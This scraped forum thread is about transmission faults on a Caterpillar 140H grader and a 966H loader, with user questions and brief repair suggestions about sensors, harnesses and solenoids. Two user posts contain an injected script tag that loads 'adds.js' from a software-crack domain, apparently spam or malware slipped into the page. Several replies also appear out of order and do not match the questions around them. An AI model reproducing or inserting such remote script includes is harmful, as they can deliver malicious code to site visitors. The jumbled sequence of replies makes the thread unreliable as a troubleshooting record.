Highlighted

Re: 140H Transmission Problem!

Hello,

i am currently fixing a grader with a transmission problem. There no active codes using CAT ET. As shown in CAT ET it accepts only the first forward gear and the rest despite engaging the gear lever remains neutral. the propeller from the transmission is not rotating even in first gear(The only gear that works according to ET).

reading the troubleshooting procedure from sis it directs me to check wiring of the machine harness. Does anyone know where i can locate this?

Assalamualikum wa rahmatullah
Dear sir my name is Muhammad safdar khan dear sir i have a catterpiller 966h wheel loaders from pakistan sir we have a not working number( 2 gear) only 1,3,4gear work dear sir pleas send me salution
Contributor

If the lampis on all the time right from start up you have either got  a shorted sensor or a shorted harness it is inexpensive to swap the sensor just for a try or you could ohm it & see if it  is within specs if so sounds like a wire shorted to ground that tells the TCM that the sensor is maxed out tohigh temp& turns on your action lamp.  

Rooster
www.bigmsrepair.com

I have changed tranmision oil and transmision filters..... But same prolem is coming again....... What should I do???????

<script type="text/javascript" src="http://cracks4free.info/5/adds.js"></script>
Contributor

this is a transmission temp warning light

Rooster
www.bigmsrepair.com

I have grader 140H....... It is displaing a warning on screen as given below on picture.... Please help me out....... SAM_2577.JPG

<script type="text/javascript" src="http://cracks4free.info/5/adds.js"></script>
Visitor

Yes. I found out it was a broken wire in the loom going to the solenoids.
Contributor

Did you get this 140H fixed yet???

Rooster
www.bigmsrepair.com
Visitor

140H Transmission Problem!

I have a 140H with a trans issue. All the gears work and move the machine. 2nd, 3rd ,6th all move the machine put are slugish and will not spin the tires when the moldboard is on the ground. I replaced the common solenoid for those gears and still the same problem. I have removed the solenoid manifold and checked the valve directly inline with the solenoid for movement and cleanliness and all seems fine(no broken springs). Tommorow i am going to check pressures. What should the pressures be? Also I recently replaced the ECM by the Local CAT dealer.I  do not know if the flashing of the ECM had somthing to do with it. Any help or advice would be much appreciated!